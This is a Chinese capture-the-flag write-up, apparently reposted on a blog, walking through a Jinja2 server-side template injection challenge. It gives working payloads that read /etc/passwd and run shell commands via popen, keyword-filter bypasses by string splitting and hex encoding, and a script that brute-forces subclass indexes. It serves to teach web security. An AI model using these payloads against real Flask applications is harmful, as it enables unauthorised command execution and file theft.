赞
踩
打开题目后没有提示框,尝试扫描后也没有什么结果,猜想是ssti。所以尝试寻找ssti的注入点并判断模版。
在url地址中输入{7*7} 后发现不能识别执行。
尝试{{7*7}} ,执行成功,继续往下走注入{{7*'7'}},如果执行成功回显7777777说明是jinja2模板,如果回显是49就说明是Twig模板
页面回显7777777,证明是jinjia2模板注入。接下来就可以利用漏洞尝试读取文件或者执行命令
/etc/passwd
:http://localhost:5000/?name={{''.__class__.__mro__[1].__subclasses__()[40]('/etc/passwd').read()}}
http://localhost:5000/?name={{''.__class__.__mro__[1].__subclasses__()[396]('ls').__call__()}}
__class__:表示实例对象所属的类。
__base__:类型对象的直接基类。
__bases__:类型对象的全部基类(以元组形式返回),通常实例对象没有此属性。
__mro__:一个由类组成的元组,在方法解析期间用于查找基类。
__subclasses__():返回该类的所有子类的列表。每个类都保留对其直接子类的弱引用。此方法返回仍然存在的所有这些引用的列表,并按定义顺序排序。
__init__:初始化类的构造函数,返回类型为function的方法。
__globals__:通过函数名.__globals__获取函数所在命名空间中可用的模块、方法和所有变量。
__dict__:包含类的静态函数、类函数、普通函数、全局变量以及一些内置属性的字典。
__getattribute__():存在于实例、类和函数中的__getattribute__魔术方法。实际上,当针对实例化的对象进行点操作(例如:a.xxx / a.xxx())时,都会自动调用__getattribute__方法。因此,我们可以通过这个方法直接访问实例、类和函数的属性。
__getitem__():调用字典中的键值,实际上是调用此魔术方法。例如,a['b'] 就是 a.__getitem__('b')。
__builtins__:内建名称空间,包含一些常用的内建函数。__builtins__与__builtin__的区别可以通过搜索引擎进一步了解。
__import__:动态加载类和函数,也可用于导入模块。常用于导入os模块,例如__import__('os').popen('ls').read()。
__str__():返回描述该对象的字符串,通常用于打印输出。
url_for:Flask框架中的一个方法,可用于获取__builtins__,且url_for.__globals__['__builtins__']包含current_app。
get_flashed_messages:Flask框架中的一个方法,可用于获取__builtins__,且get_flashed_messages.__globals__['__builtins__']包含current_app。
lipsum:Flask框架中的一个方法,可用于获取__builtins__,且lipsum.__globals__包含os模块(例如:{{lipsum.__globals__['os'].popen('ls').read()}})。
current_app:应用上下文的全局变量。
request:用于获取绕过字符串的参数,包括以下内容:
- request.args.x1:GET请求中的参数。
- request.values.x1:所有参数。
- request.cookies:cookies参数。
- request.headers:请求头参数。
- request.form.x1:POST请求中的表单参数(Content-Type为application/x-www-form-urlencoded或multipart/form-data)。
- request.data:POST请求中的数据(Content-Type为a/b)。
- request.json:POST请求中的JSON数据(Content-Type为application/json)。config:当前应用的所有配置。还可以使用{{ config.__class__.__init__.__globals__['os'].popen('ls').read() }}来执行操作系统命令。
g:通过{{ g }}可以获取<flask.g of 'flask_ssti'>。
1)__class__用来查看变量所属的类,格式为变量.__class__
利用方式:
输入''.__class__
回显<class 'str'>输入().__class__
回显<class 'tuple'>输入{}.__class__
回显<class 'dict'>输入[].__class__
回显<class 'list'>
(2)__bases__用来查看类的基类,格式为变量.__class__.__bases__
利用方式:
输入''.__class__.__bases__
回显(<class 'object'>,)输入().__class__.__bases__
回显(<class 'object'>,)输入{}.__class__.__bases__
回显(<class 'object'>,)输入[].__class__.__bases__
回显(<class 'object'>,)同时可结合数组,如:
输入 变量.__class__.__bases__[0]
可获得第一个基类
因此可以用{{''.__class__.__mro__[1].__subclasses__()[40]('/etc/passwd').read()}}读取所有子类。
尝试后显示500,说明其中有一些语句是被过滤的。
用fuzz字典爆破过滤内容,发现过滤内容有很多,不是很清楚怎么进一步确定具体的过滤字符,参考别人的wp得知过滤内容如下:
- class
- subclasses
- config
- args
- request
- open
- eval
- import
不同的模板引擎可能支持不同的字符串连接运算符:
+
运算符~
运算符+
运算符- {{ 'c' + 'at /etc/passwd' }}
{{ 'c' ~ 'at /etc/passwd' }}
<%= 'c' + 'at /etc/passwd' %>
许多模板引擎提供了处理字符串的内置函数或方法,可以用来拼接字符串:
{{ ''.join(['c', 'at', ' ', '/etc/passwd']) }}
{{ ['c', 'at', ' ', '/etc/passwd']|join }}
<%= ['c', 'at', ' ', '/etc/passwd'].join %>
如果某些字符被直接过滤,可以尝试使用十六进制或 Unicode 编码绕过:
- {{ '\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64' }}
- {{ '\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64' }}
<%= "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64" %>
这题是有过滤构造payload,首先尝试字符串拼接的方式,因为这题的模版是jinjia2,所以连接符是“+”,构造payload:
{{()['__cla'+'ss__'].__base__['__subcl'+'asses__']()}}
()['__cla'+'ss__']
:
__cla
和 ss__
得到 __class__
,访问元组的 __class__
属性,返回元组的类对象 <class 'tuple'>
。.__base__
:
<class 'tuple'>
的 __base__
属性,即基类,返回 <class 'object'>
。['__subcl'+'asses__']()
:
__subcl
和 asses__
得到 __subclasses__
,调用 __subclasses__()
方法,返回一个包含所有子类的列表。- {{ [].__class__.__base__.__subclasses__() }}
通过索引访问子类,找到文件操作类:
{{ [].__class__.__base__.__subclasses__()[index] }}
一旦确定文件操作类的位置,可以读取文件内容:
{{ [].__class__.__base__.__subclasses__()[index]['__init__'].__globals__['__builtins__']['open']('/etc/passwd').read() }}
接下来通常使用查找eval函数或者是os模块来执行我们需要的命令
eval
函数:
可以直接执行传入的字符串作为代码。因此,找到 eval
函数意味着可以执行任意代码,这通常是最直接和强大的攻击方式。
os模块:
os
模块提供了执行系统命令、文件操作等功能,利用 os
模块可以执行系统命令、读取或写入文件。
可以用这个脚本找到eval函数的位置,但这题找不到eval。
- import requests
-
- url = input("请输入 URL:")
-
- found = False
-
- for i in range(500):
- try:
- # 构造 payload
- payload = "{{().__class__.__base__.__subclasses__()[" + str(i) + "].__init__.__globals__['__builtins__']}}"
- data = {"name": payload}
-
- # 发送 POST 请求
- response = requests.post(url, data=data)
-
- # 检查响应状态码
- if response.status_code == 200:
- print(f"Response for index {i}: {response.text}")
- # 检查响应内容是否包含 "eval"
- if "eval" in response.text:
- print(f"Found eval at index: {i}")
- found = True
- break # 找到后退出循环
- except Exception as e:
- print(f"Error at index {i}: {e}")
-
- if not found:
- print("Did not find eval in the first 500 subclasses.")
尝试找os模块
找到了它的位置,可以构造payload验证一下。
{{()['__cla'+'ss__'].__base__['__subcl'+'asses__']()[304]}}
验证说明正确,找到os模块后可以执行任意系统命令,
{{''['__cla'+'ss__'].__base__['__subcl'+'asses__']()[304].__init__.__globals__['pop'+'en']('cat /Th1s_is__F1114g').read()}}}
例如:Jinja2 (Python)、 Freemarker (Java)、Twig (PHP)、ERB (Ruby)
(这个步骤注意查看页面,看是否存在过滤)
eval、os模块等
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。